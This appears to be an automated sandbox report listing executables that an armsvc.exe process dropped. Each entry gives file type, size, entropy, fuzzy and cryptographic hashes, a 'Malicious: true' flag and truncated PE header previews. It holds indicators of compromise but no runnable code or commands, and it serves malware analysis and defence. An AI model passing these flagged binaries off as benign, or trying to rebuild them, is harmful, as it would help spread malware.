                                                                                                                                                  File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):1678336
                                                                                                                                                  Entropy (8bit):4.928002299015052
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:24576:7yAAWSS2Ht3/TwSfVcYG3K/cJHlnFR+IGNe8j3Iz:7IUMt3LNiXicJFFRGNzj3
                                                                                                                                                  MD5:9041A94CFCF6C29217D288349E69E3B8
                                                                                                                                                  SHA1:160C77701F31CCFB153504962E6AD0BC9D44B7A5
                                                                                                                                                  SHA-256:A2263BC86226F7CDBD1FEEE70BEF89C5D2CCCBE724C2049EAFF15E2DDE44B317
                                                                                                                                                  SHA-512:A6E7931B31BD2386EDD4B69C303FE12D992131A4A16AE47161FA5B1D97F3406B01819B53D395C2B6121D44001B5FB66F2556616470D39499735B690F1AB0096A
                                                                                                                                                  Malicious:true
                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$............f.@.f.@.f.@...@.f.@...A.f.@...A.f.@...A.f.@...A.f.@...A.f.@...A.f.@.f.@.d.@...A.f.@...ASf.@..z@.f.@.f.@.f.@...A.f.@Rich.f.@................PE..L......e............... .........................@...........................$.....Z...................................................,T..............................8...................Hj..........@...................D...`....................text...u........................... ..`.rdata..0...........................@..@.data...............................@....c2r.................d...................rsrc...,T.......V...f..............@..@.reloc..............................@...................................................................................................................................................................................................................................................
                                                                                                                                                  Process:C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                                                                                                                                                  File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):1449472
                                                                                                                                                  Entropy (8bit):4.753527362242671
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:24576:ASG/TwSfVcYG3K/cJHlnFR+IGNe8j3Iz:qLNiXicJFFRGNzj3
                                                                                                                                                  MD5:7DCC637961C221E4F5CE79D608CBAF27
                                                                                                                                                  SHA1:E472AD1391AB38FF791AD80E105864C6E042DD37
                                                                                                                                                  SHA-256:CF596286FE4C67D868E544F3C5A351BE2413AAD98E46565227219919C1F5806F
                                                                                                                                                  SHA-512:1191552F2524FFCAEFA12E3DE714DD8C8D217EABD4CF13A711991728901CD4F27A6AF1347955DCC175CD633DE6DF646048EB4ACC083D74092083F0CCA0392AE1
                                                                                                                                                  Malicious:true
                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........?...^.U.^.U.^.U.&rU.^.U.$.T.^.U.$.T.^.U.$.T.^.U2,.T.^.U2,.T.^.U.^.U.\.U.$.T.^.U.$.T.^.U.$.T.^.U.$.U.^.U.^vU.^.U.$.T.^.URich.^.U........................PE..L......e............... ............&q............@...........................!..............................................p..,.......`...........................(...8...............................@............................................text............................... ..`.rdata..|o.......p..................@..@.data....T.......R..................@....c2r....T....p.......L...................rsrc...`............N..............@..@.reloc...............^..............@...........................................................................................................................................................................................................................................
Process: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
File Type: PE32 executable (console) Intel 80386, for MS Windows
Category: dropped
Size (bytes): 1303552
Entropy (8bit): 4.538127877587889
Encrypted: false
SSDEEP: 12288:J0aiJw/9Rrw0R1u4V/0YG3wx6EcJHUEhPUotFZr+1izHGNe8jKk34z:Z/TwSfVcYG3K/cJHlnFR+IGNe8j3Iz
MD5: F2662F4535D0B91367DD232B92B9175F
SHA1: 84418ECBB88AE0A31FE59B9DBAF3C76DB9A79F2E
SHA-256: BA77962A33C6802C1999F6456BCCBCD6FA9D65D90D8A1F1996C1779EC48F0C14
SHA-512: 581A02D3393708D4E41CF98B2F6CBF3B763D111E4265058CE32D92509E680A2482C2BC063853B379B865A04D51530992E322BE3EEB44768BB76526CB33DCB448
Malicious: true
Process: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
File Type: PE32 executable (GUI) Intel 80386, for MS Windows
Category: dropped
Size (bytes): 1574400
Entropy (8bit): 4.962254123522496
Encrypted: false
SSDEEP: 24576:/AZHHrUZF/S/TwSfVcYG3K/cJHlnFR+IGNe8j3Iz:/e4ZFSLNiXicJFFRGNzj3
MD5: 6E2942B3938F4E34ADA923E0597DD61F
SHA1: 58F6D2D8FCFB621DB86E5F01E7BAD7891B2D1181
SHA-256: EF02A7615F93F003DC079039876CB4FCDDC797730C387891F35A5BA9A24A0FAF
SHA-512: A3A91C845D429E6B162A66E81C3AD3609D69B60A17989AF91D92D5852D8D9C6994056FDEE2AB3431B1688B3C7A08213252540D51FC510A30C3F136792AFC0F50
Malicious: true
Process: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
File Type: PE32 executable (GUI) Intel 80386, for MS Windows
Category: dropped
Size (bytes): 53721600
Entropy (8bit): 6.54314106368072
Encrypted: false
SSDEEP: 1572864:GNVpTyR96CwKImp81ujlSHFsQ4adtZp20wfP+9HgoZRZa:GQ9lw68HSq
MD5: 03F7E82373A773C04C40C4CCF9811849
SHA1: 5E8172E20076ACFF9D2AEA1A513735BEE92EE63F
SHA-256: 72047669775EDB5164C10BFAE8406C3BD8F3C4EA495E65875B7F6BD8DC54E0B8
SHA-512: 3A7784AE58CB421AADEA7576C6A5A350A5407DD8689E24ADF4DB1E0E6D132498A293AB7852EDBA6904153EE18DCD9847128037A86D1488F352EEDCF304525BFC
Malicious: true
Process: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
File Type: PE32+ executable (GUI) x86-64, for MS Windows
Category: dropped
Size (bytes): 1812992
Entropy (8bit): 5.250015295289358
Encrypted: false
SSDEEP: 24576:7d8DMeflpnIOvYUk/TwSfVcYG3K/cJHlnFR+IGNe8j3Iz:7CDD9pnIOWLNiXicJFFRGNzj3
MD5: 1BF7F1B149AE7AF7FB56398B704AF1A8
SHA1: 7CDD4DCFEDCDB1D7135FDA71E92B8FA558F577BB
SHA-256: 317346C353B1FADB92651E7714416F76EE861638F8B99515327780EC6C2DBC6F
SHA-512: A7091BE61E3AD5FAB14CE7E74C95D30949F1A586DA725EB986DC37F10532DD0F0B2BB86813AC968CC73D272EE6CE000CB0C6D1A53BA59B35B824C96B49127EA9
Malicious: true
Process: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
File Type: PE32+ executable (GUI) x86-64, for MS Windows
Category: dropped
Size (bytes): 4364800
Entropy (8bit): 6.745653091201487
Encrypted: false
SSDEEP: 49152:8B1sstqMHiq8kBfK9a+cOVE/TqEpEepdkRqqUu9wg6KFYso8l8EtLNiXicJFFRGN:2HzorVmr2gkRpdJYolj7wRGpj3
MD5: A1226BDDD97F3B6115A3E61625156B61
SHA1: 65229F00F2E45B31A2D07B87932D450314E0290D
SHA-256: 614800315DB5E90B74E82C49C228BA1CE6E688B68B55F552337E296BA4A966A5
SHA-512: 362EC3C7B780A90A62EFBCDB633ADB2CA0D67A71A0D4318CEDB70D81E821E7AEFEA4D5F513D333E464667654B2262334904DB5E02DADA6C125D70E1E6E0462FB
Malicious: true
Process: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
File Type: PE32+ executable (GUI) x86-64, for MS Windows
Category: dropped
Size (bytes): 1394176
Entropy (8bit): 4.671285533410348
Encrypted: false
SSDEEP: 24576:qEyTG/TwSfVcYG3K/cJHlnFR+IGNe8j3Iz:xyaLNiXicJFFRGNzj3
MD5: 1148F6FC54F34B3AA2D353F1644B1550
SHA1: F75D7078FFB60600CF1657D2B50C151C0A136643
SHA-256: 2A7340760D1AFDC82DBF8FE40C41A6C0103E0DC23A05B0C3DA4810D84AE149E1
SHA-512: 1B6EAFB5FBD9B458139AC2280C69AB4E5C86978ECD1766C08D0B5507084CBE598B57BA4B4BA0DB8984CA01D0E4230DA59BFFFD44728908F34ECDF0671F0DE6E3
Malicious: true
Process: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
File Type: PE32+ executable (GUI) x86-64, for MS Windows
Category: dropped
Size (bytes): 2354176
Entropy (8bit): 7.045032763676261
Encrypted: false
SSDEEP: 49152:2hDdVrQ95RW0YQHyWQXE/09Val0GjLNiXicJFFRGNzj3:2hHYWmHyWKc7wRGpj3
MD5: 0B79C87888F1F817B9EF1809AC8DC7F0
SHA1: 63FFD69CD33B44B577C8AA0322DAAF7BB386876A
SHA-256: 2CF8AE9CC641075626AC8C7C995A2A411D606C274964121368A76D6F1A7710A8
SHA-512: A9D120F9631D41A9A3BDB90FDA464A2D33C0B228D72204995A9A40CBBA4A0F0A9386734EADD7C255F1E8A9707FAF8688CCC04D90BD54EE13C684FBF73959C5AF
Malicious: true
Process: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
File Type: PE32+ executable (GUI) x86-64, for MS Windows
Category: dropped
Size (bytes): 1825280
Entropy (8bit): 7.15210152347625
Encrypted: false
SSDEEP: 24576:/70E0ZCQZMib6Rrt9RoctGfmdd9/TwSfVcYG3K/cJHlnFR+IGNe8j3Iz:T0EzQS7RPRoc15LNiXicJFFRGNzj3
MD5: CD01EBE3D88A1467F671D92E467A6EBE
SHA1: 104CD36EAB7B9205F1161FD60E9875D9AB0859C1
SHA-256: A9ABD4B1144DEC74E37F58BD74A2E83E57CA68796F1E19ED2DCE77D4C60CCE0C
SHA-512: 73F56B13DDBF352CBB46C3F08A1BC0056CCD9FE3C4B63F79EE391433CB46E2494945157F47770D55AC26702DAAE2A70F7B20731424016B010EFFF5AB8560C190
Malicious: true
Process: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
File Type: PE32+ executable (GUI) x86-64, for MS Windows
Category: dropped
Size (bytes): 1847808
Entropy (8bit): 7.139181413137103
Encrypted: false
SSDEEP: 24576:xiD2VmA1YXiHwlklb8boUuWPg2g6/TwSfVcYG3K/cJHlnFR+IGNe8j3Iz:QD2VmAygwIb8boQNLNiXicJFFRGNzj3
MD5: 54173D15F204051B2ACFDCA1C0CD52D4
SHA1: 84194EA3D28192D4BE913531789D9B77B4F70CCC
SHA-256: 0A1CEB58932CCF0C6C82B409CFEC6772E23AB33EAD48A2B788B670E1B3EC3480
SHA-512: 6D546B7B0163BEBF6C8B3D88E956BF31D931FDF6A28595ADD727D6E3AF692594A1D3EFAF5AB351B1A539E8EF47A60E79E92D0609CFC7C15240121CE7F3875066
Malicious: true
Process: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
File Type: PE32+ executable (GUI) x86-64, for MS Windows
Category: dropped
Size (bytes): 2853376
Entropy (8bit): 6.946964401475805
Encrypted: false
SSDEEP: 49152:QfD3zO9ZhBGlohzM3HRNr00FLNiXicJFFRGNzj3:6DaalSzM00F7wRGpj3
MD5: D80E83CE246D2EF836705BE651C19BE4
SHA1: 94361F862AB1FE8F277F76B65EB157683B07D4F9
SHA-256: 6364FDF5DC5F08AD1E932175B8E0E2921177EF9272015EA7BC4011E3358791A1
SHA-512: 86A86ADD76ED295CC6967A70B53CD653ED717917F192884A265B068E1F68D1242C36694C9563EE6AFA4F73F56349FCE85D3B33EF2F3E263520B5468A9967C002
Malicious: true
                                                                                                                                                  Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d...f..e.........."......l...2......@..........@..............................-....../,... .................................................h.........!.. ...P ........................8......................(...P...@...............x............................text....k.......l.................. ..`.rdata...............p..............@..@.data...T....p.......^..............@....pdata.......P ......d..............@..@.00cfg..0.... !......* .............@..@.gxfg...P1...0!..2..., .............@..@.retplne.....p!......^ ..................tls..........!......` .............@...LZMADEC.......!......b ............. ..`_RDATA..\.....!......t .............@..@malloc_h......!......v ............. ..`.rsrc.... ....!.."...x .............@..@.reloc........$.......".............@...................................................................................................
                                                                                                                                                  Process:C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                                                                                                                                                  File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):4320256
                                                                                                                                                  Entropy (8bit):6.8219091890021115
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:49152:VTaRe7mkn5KLvD5qGVC008/pb4tgLUgGEsLABD5wTQh07yrLMLl9YPheLNiXicJy:sI72Lvkr4pbxJRoIM97wRGpj3
                                                                                                                                                  MD5:7D767BB2A72DD99654CDA6E8C05E9F59
                                                                                                                                                  SHA1:ACB5EDDE83C94F3EF772666403D52BA291B5F9DA
                                                                                                                                                  SHA-256:46368158295ABF382D59DD1CEC8F94D8C679722A5E2FF675227D0B36F31AA1DE
                                                                                                                                                  SHA-512:E46C910DBE2EAA5FA200974797BDD46A29A8F648B6C973A6735ACB1ECD904985BFCAB884BC547C5BB541B3BD511785D17947E33C68A62139EC53E7F8EA3D63E0
                                                                                                                                                  Malicious:true
                                                                                                                                                  Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d...f..e..........".......,......... k.........@..............................C.....V.B... ..........................................'3......+3.P.....8.x....P6..e..................h.2.T.....................2.(...P"-.@............43.......3. ....................text...E.,.......,................. ..`.rdata..4#....-..$....,.............@..@.data........@4.......4.............@....pdata...e...P6..f...45.............@..@.00cfg..0.....7.......6.............@..@.gxfg...@4....7..6....6.............@..@.retplne......8.......6..................tls....-.... 8.......6.............@...CPADinfo8....08.......6.............@...LZMADEC......@8.......6............. ..`_RDATA..\....`8.......6.............@..@malloc_h.....p8.......6............. ..`.rsrc...x.....8.......6.............@..@.reloc... ...p:.......8.............@...........................................................
                                                                                                                                                  Process:C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                                                                                                                                                  File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):2062336
                                                                                                                                                  Entropy (8bit):7.091538190635118
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:24576:VW9Jml9mmijxiMnF+ZxmQWcbLw8Vt/TwSfVcYG3K/cJHlnFR+IGNe8j3Iz:VWnm5iAMkjmQWkVtLNiXicJFFRGNzj3
                                                                                                                                                  MD5:D77924C075BB32DD490896405BF7C954
                                                                                                                                                  SHA1:EF7DC71A71700D8EE069B19DEEDA1D7489A516DE
                                                                                                                                                  SHA-256:1ABABC68AEE3F0AB0E7470A272116B7142F5AA6F15D3D8982034A13E7C0CB5D5
                                                                                                                                                  SHA-512:B1E17CD0D3B6A3D35A3236A12E1880C9B285C40BB16F7350D26CE05FB5F5BDCF748AC8A5D65EF881F4973D135386E4F3515A43EC65823A8E3FAACD000A69D98B
                                                                                                                                                  Malicious:true
                                                                                                                                                  Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d...f..e.........."......h...4......P..........@.............................. ......y.... .................................................Z...................H......................8.......................(...`...@...........(...@............................text....g.......h.................. ..`.rdata...).......*...l..............@..@.data...............................@....pdata..H...........................@..@.00cfg..0....P.......H..............@..@.gxfg...p-...`.......J..............@..@.retplne.............x...................tls.................z..............@...CPADinfo8............|..............@..._RDATA..\............~..............@..@malloc_h............................ ..`.rsrc...............................@..@.reloc..............................@...................................................................................................
                                                                                                                                                  Process:C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                                                                                                                                                  File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):1801216
                                                                                                                                                  Entropy (8bit):7.15990573842476
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:24576:lwNHwoYhua6MZERO4qbBJTY6mY1uIgL/TwSfVcYG3K/cJHlnFR+IGNe8j3Iz:lwNPdNO7BJTfmEsLNiXicJFFRGNzj3
                                                                                                                                                  MD5:A32CD7F6030A0C77DFBDF76643CEE33F
                                                                                                                                                  SHA1:3E9C74EB8773EB2FD4FAA3AC70B11FEF69F77F87
                                                                                                                                                  SHA-256:2B7B487956F5CE904953852E9236E43EF4E5BB4196632F7CD1A96C61B6821D77
                                                                                                                                                  SHA-512:162709DA2D11BD1FD72DF62246D677E9829AA4DB3E5438E9568A38DBE90ED1E635930A61C48B8E7ED317099C0C88E247434F1470BF7BA7B19005EF97A6DB288C
                                                                                                                                                  Malicious:true
                                                                                                                                                  Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d...f..e.........."......*...r......P..........@.......................................... .........................................C...........................T.......................T.......................(....R..@............"..8.......`....................text....(.......*.................. ..`.rdata.......@......................@..@.data...@...........................@....pdata..T...........................@..@.00cfg..0....@.......N..............@..@.gxfg....,...P...,...P..............@..@.retplne.............|...................tls.................~..............@..._RDATA..\...........................@..@malloc_h............................ ..`.rsrc...............................@..@.reloc..............................@...........................................................................................................................................
                                                                                                                                                  Process:C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                                                                                                                                                  File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):1847808
                                                                                                                                                  Entropy (8bit):7.139178706754582
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:24576:viD2VmA1YXiHwlklb8boUuWPg2g6/TwSfVcYG3K/cJHlnFR+IGNe8j3Iz:qD2VmAygwIb8boQNLNiXicJFFRGNzj3
                                                                                                                                                  MD5:1043E2434D6D4C12212BEFD2E85809EA
                                                                                                                                                  SHA1:4E572BEFF9657D11F0B10F0329F7A03E180B0B01
                                                                                                                                                  SHA-256:8923A2948EA8F31C1895BE9062C86A7F4A342F46BA0204AADBD939F33730C6FF
                                                                                                                                                  SHA-512:E8D81A7014D9DF5470151A09D1BC89CBACC0B41B1E7AA6A2A1757E8EA3026089B8BAB099B95359E69CF1374ADD65316ADAE8F92543406F391B058EF863C88F63
                                                                                                                                                  Malicious:true
                                                                                                                                                  Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d...f..e.........."..................p.........@.............................p......-..... .........................................2...........d....`..8....P..........................8......................(.......@...............X...(........................text...4........................... ..`.rdata..|...........................@..@.data................r..............@....pdata.......P.......n..............@..@.00cfg..0...........................@..@.gxfg....,..........................@..@.retplne..... ...........................tls.........0.......0..............@..._RDATA..\....@.......2..............@..@malloc_h.....P.......4.............. ..`.rsrc...8....`.......6..............@..@.reloc.......p.......B..............@...........................................................................................................................................
                                                                                                                                                  Process:C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                                                                                                                                                  File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):1801216
                                                                                                                                                  Entropy (8bit):7.159897473678515
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:24576:ywNHwoYhua6MZERO4qbBJTY6mY1uIgL/TwSfVcYG3K/cJHlnFR+IGNe8j3Iz:ywNPdNO7BJTfmEsLNiXicJFFRGNzj3
                                                                                                                                                  MD5:01090FCCE9FDC648E90D0582FCFE7619
                                                                                                                                                  SHA1:A0AC00C6DF869165A7BDA15250ED40DE773C9E81
                                                                                                                                                  SHA-256:91289047AA9D03EF60C50E0BBBDE24DC050A3942DE0ABDE952A46CDEB02EC5F5
                                                                                                                                                  SHA-512:2043CCABB0F01E7D62269707A6CDF61C0DEF12F30DC7C702DDD2241B9F75F7951ECEDDE1CE1BBA59890EFDE3B7CD5E007622AAC640B57103BE015E4293B7E720
                                                                                                                                                  Malicious:true
                                                                                                                                                  Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d...f..e.........."......*...r......P..........@....................................u;.... .........................................C...........................T.......................T.......................(....R..@............"..8.......`....................text....(.......*.................. ..`.rdata.......@......................@..@.data...@...........................@....pdata..T...........................@..@.00cfg..0....@.......N..............@..@.gxfg....,...P...,...P..............@..@.retplne.............|...................tls.................~..............@..._RDATA..\...........................@..@malloc_h............................ ..`.rsrc...............................@..@.reloc..............................@...........................................................................................................................................
                                                                                                                                                  Process:C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                                                                                                                                                  File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):1481216
                                                                                                                                                  Entropy (8bit):4.6941332206315
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:24576:76lbht6BHg/TwSfVcYG3K/cJHlnFR+IGNe8j3Iz:WlNtqHgLNiXicJFFRGNzj3
                                                                                                                                                  MD5:C12D62C1958FC1FEF2FB15A39293073D
                                                                                                                                                  SHA1:3173E20764054674BF944A5C5C09C50A82F0F724
                                                                                                                                                  SHA-256:C3F99914792D4E776B138DB7DD771969835C38D07C445FA56D8468DC8B15798A
                                                                                                                                                  SHA-512:5431E1E9227F392276BC01C98A34104BB1ED1A2C7017E88ED531F166999B6A95D93FA7F78BE15F0EC5B4FE51135CDDA34D4109F16E6F1C344FCA9B8CF9C9957F
                                                                                                                                                  Malicious:true
                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......o.y.+c..+c..+c..?...!c..?....c..?...9c..I...:c..I...8c..I....c..?...*c..?....c..+c..Xc......)c.....*c..+c..|c......*c..Rich+c..........................PE..L...B(.d.................^..........@........p....@...........................!.............................................H...<........q..........................pu..p...........................X...@...............@....k..`....................text...`\.......^.................. ..`.data........p.......b..............@....idata...............l..............@..@.didat...............v..............@....rsrc....q.......r...x..............@..@.reloc...p...0......................@...........................................................................................................................................................................................................................................
                                                                                                                                                  Process:C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                                                                                                                                                  File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):1376768
                                                                                                                                                  Entropy (8bit):4.656851590275436
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:24576:eIxkTBVV/TwSfVcYG3K/cJHlnFR+IGNe8j3Iz:zxk1VVLNiXicJFFRGNzj3
                                                                                                                                                  MD5:2DFF104E6391A8D0F521501952E272E9
                                                                                                                                                  SHA1:4A8EDEE3D6AA9ED623B2CE88F0F7431A8D390519
                                                                                                                                                  SHA-256:A5039FE650D030986A9F68C4EC7046AFB3DF2C8213E224905E70B51DEEDBE5B4
                                                                                                                                                  SHA-512:CEB61A7FBA22664E90100BC48EB8315ABB016C29A32AECBFDEC159AD79989802E8A33FF3A3284543D67596103770CD1AE2C857B53712900C44E82987FFE588C5
                                                                                                                                                  Malicious:true
                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........,.B...B...B...A...B...G...B...F...B...G...B...F...B...A...B...C...B...C..B...G...B......B......B...@...B.Rich..B.........................PE..L...8(.d..........................................@........................... .............................................x...(....`..X3..............................p...............................@.......................@....................text............................... ..`.rdata...`.......b..................@..@.data........0......................@....didat.......P......................@....rsrc...X3...`...4..................@..@.reloc...p...........R..............@...................................................................................................................................................................................................................................................
                                                                                                                                                  Process:C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                                                                                                                                                  File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):1490944
                                                                                                                                                  Entropy (8bit):4.787378249310515
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:24576:ncssmr4/TwSfVcYG3K/cJHlnFR+IGNe8j3Iz:cbvLNiXicJFFRGNzj3
                                                                                                                                                  MD5:A7104A33FBC7F2A8DBCE04C0FEC163B5
                                                                                                                                                  SHA1:4DC28014D0412B31015FE4BF804D9F61253C8F3F
                                                                                                                                                  SHA-256:04AA38812D6D60E1FCDE3C5B72A836A6718B318C0FF36065AB9D818A03EC6CE2
                                                                                                                                                  SHA-512:9AAE46B1A3D4482A05168250E8504AD7BB0F96093E0E23C40AFA3B207FF63C73690F7C6E6A8993DA1B1F6F84C62C9568E796F0FF8C1C7D92C2ECD7D9F17AA06A
                                                                                                                                                  Malicious:true
                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$............O.@.O.@.O.@.$.A.O.@.$.A|O.@.7.A.O.@.7.A.O.@.7.A.O.@W6.A.O.@.$.A.O.@.$.A.O.@.$.A.O.@.O.@IN.@W6.A.O.@W6.@.O.@W6.A.O.@Rich.O.@........PE..d...@(.d.........."......n...........].........@..............................!.....L..... .....................................................(............@..........................p.......................(...p,..@...............0............................text....l.......n.................. ..`.rdata..8z.......|...r..............@..@.data...P3..........................@....pdata.......@......................@..@.didat.......`......................@..._RDATA.......p......................@..@.rsrc...............................@..@.reloc...`........... ..............@...........................................................................................................................................................
                                                                                                                                                  Process:C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                                                                                                                                                  File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):1539584
                                                                                                                                                  Entropy (8bit):4.896556576554488
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:24576:zTfcT++foSBWU2YxhkgL/TwSfVcYG3K/cJHlnFR+IGNe8j3Iz:vfcK+foQWU2YnPLLNiXicJFFRGNzj3
                                                                                                                                                  MD5:DD93F24F13C3E6FFA12EF57F3C86556A
                                                                                                                                                  SHA1:34FBC749A57900DAC0D6EB345155538B9FA39557
                                                                                                                                                  SHA-256:F599BBBBF29CE1BE628B5BEBB271A2B18FD5FD989CA759AB8AD4139D8C34A095
                                                                                                                                                  SHA-512:5ED0718437F5A5EF5A5778684DD7B6992C87A3D3AD82095B25B3787F279F549F8619A6D32D87A73E855C66CC4A3862C4F451A60AE8B349C6C21CE194883BE1A4
                                                                                                                                                  Malicious:true
Process:C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
File Type:PE32 executable (GUI) Intel 80386, for MS Windows
Category:dropped
Size (bytes):1376768
Entropy (8bit):4.656896633965884
Encrypted:false
SSDEEP:24576:YbBRzBgr/TwSfVcYG3K/cJHlnFR+IGNe8j3Iz:iBRVgrLNiXicJFFRGNzj3
MD5:A6FA06857C60BD47FB78C9B0F80BF2E1
SHA1:8D49134AD2EA7E37E3A1E123548E83457E76DE6C
SHA-256:B4D147BF4F25C3D46A60D5678F834C42EABC8B235D8EF3CF2CF6E50DAAC66FE8
SHA-512:1413C4ECAACCB7E690BDAA399E9401C68C9B0EED58587DBBCE6C178794A3BE8BD433ABD673493B4BAC96DC46E473BEEB42903FE0D2A3EF8C2A571E0B629D9438
Malicious:true
Process:C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
File Type:PE32 executable (GUI) Intel 80386, for MS Windows
Category:dropped
Size (bytes):2168832
Entropy (8bit):7.937635672960778
Encrypted:false
SSDEEP:49152:py53w24gQu3TPZ2psFkiSqwozdLNiXicJFFRGNzj3:pyFQgZqsFki+ozd7wRGpj3
MD5:29345BF3B1387FA912417C3F28E4517F
SHA1:776023C1A75805631361FEEC3E2C7E43F2AF5801
SHA-256:2438D7A57B163BBF417D6FE6488ABBCBB491345BBB172FBD85F331BED3BBF675
SHA-512:342457E5D501C94207ED71F8BCED0BE917CEF1CB4C362691BBAD8104F3ED7F50AF2F3B882736F7133023B2C5FD6B28773412AE243CA210512D4F8955DCC48A3F
Malicious:true
Reputation:unknown
Process:C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe
File Type:ASCII text, with CRLF line terminators
Category:dropped
Size (bytes):3141
Entropy (8bit):4.83945689994571
Encrypted:false
SSDEEP:96:A83UttJ2lgLf3EQ3U/8acjQjgm4UtqKoJcJQtxRei:zPg
MD5:E62FF8604D56A86731341337EC8372AA
SHA1:CA75747C43E7CA75E6E34F1A6E108211524BF316
SHA-256:89C02AD5D894CF0181112C3B009364B62E5CC756FD917A7925627EFF1B0C175E
SHA-512:09E8857DCE1FB2BE21C4D1278EB1226ECFFA9ADD606C93D3F55AEE3117A4033802F08AAE5D054EB1562148A0C63F9BC6DE824B0D22124187E9051AE69493FC37
Malicious:false
Reputation:unknown
Preview:2024-12-10 10:24:17-0500: Disabled unneeded token privilege: SeAssignPrimaryTokenPrivilege...2024-12-10 10:24:17-0500: Disabled unneeded token privilege: SeAuditPrivilege...2024-12-10 10:24:17-0500: Disabled unneeded token privilege: SeBackupPrivilege...2024-12-10 10:24:17-0500: Disabled unneeded token privilege: SeCreateGlobalPrivilege...2024-12-10 10:24:17-0500: Disabled unneeded token privilege: SeCreatePagefilePrivilege...2024-12-10 10:24:17-0500: Disabled unneeded token privilege: SeCreatePermanentPrivilege...2024-12-10 10:24:17-0500: Disabled unneeded token privilege: SeCreateSymbolicLinkPrivilege...2024-12-10 10:24:17-0500: Could not disable token privilege value: SeCreateTokenPrivilege. (1300)..2024-12-10 10:24:17-0500: Disabled unneeded token privilege: SeDebugPrivilege...2024-12-10 10:24:17-0500: Could not disable token privilege value: SeEnableDelegationPrivilege. (1300)..2024-12-10 10:24:17-0500: Disabled unneeded token privilege: SeImpersonatePrivilege...2024-12-10 10:24:1
Process:C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
File Type:PE32+ executable (GUI) x86-64, for MS Windows
Category:dropped
Size (bytes):1512448
Entropy (8bit):4.897855403674865
Encrypted:false
SSDEEP:24576:LQVTZu0Jd/TwSfVcYG3K/cJHlnFR+IGNe8j3Iz:8VTZusLNiXicJFFRGNzj3
MD5:680DFBE855D22EE0570837F07CDC45D4
SHA1:53262356F2BCF33728A454543EEE739A03B1CD0F
SHA-256:1846E5437B05C28D0D4C911E182CF92DD8560A33EE6165862C7E346EF369548A
